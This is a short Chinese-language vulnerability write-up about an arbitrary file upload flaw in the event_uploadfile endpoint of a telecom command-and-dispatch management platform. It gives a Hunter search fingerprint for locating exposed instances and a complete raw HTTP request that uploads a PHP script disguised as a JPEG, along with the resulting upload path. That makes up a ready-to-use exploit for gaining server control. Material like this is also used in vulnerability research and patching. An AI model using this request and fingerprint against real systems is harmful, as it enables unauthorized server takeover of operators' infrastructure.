指挥调度平台event_uploadfile存在任意文件上传漏洞
一、漏洞简介
指挥调度管理平台是一个专业针对通信行业的管理平台。该产品旨在提供高效的指挥调度喝管理解决方案,以帮助通信运营商或相关机构实现更好的运营效率和服务质量。该平台提供强大的指挥调度功能,可以实时监控和管理通信网络设备、维护人员和工作任务等。用户可以通过该平台发送指令、调度人员、分配任务。指挥调度平台event_uploadfile存在任意文件上传漏洞,攻击者可通过该漏洞获取服务器权限。
二、影响版本
- 指挥调度平台
三、资产测绘
- hunter
web.body="app/structure/departments.php" - 特征
四、漏洞复现
POST /api/client/event/uploadfile.php HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Content-Length: 179
Content-Type: multipart/form-data; boundary=htu3qcyui73l2jtyqwnk
Accept-Encoding: gzip, deflate
--htu3qcyui73l2jtyqwnk
Content-Disposition: form-data; name="uploadfile"; filename="stc.php"
Content-Type: image/jpeg
<?php echo 111*111;?>
--htu3qcyui73l2jtyqwnk--
上传文件位置
/upload/event/ccc78e2b-5e61-49c0-9050-3a29687b2e81.php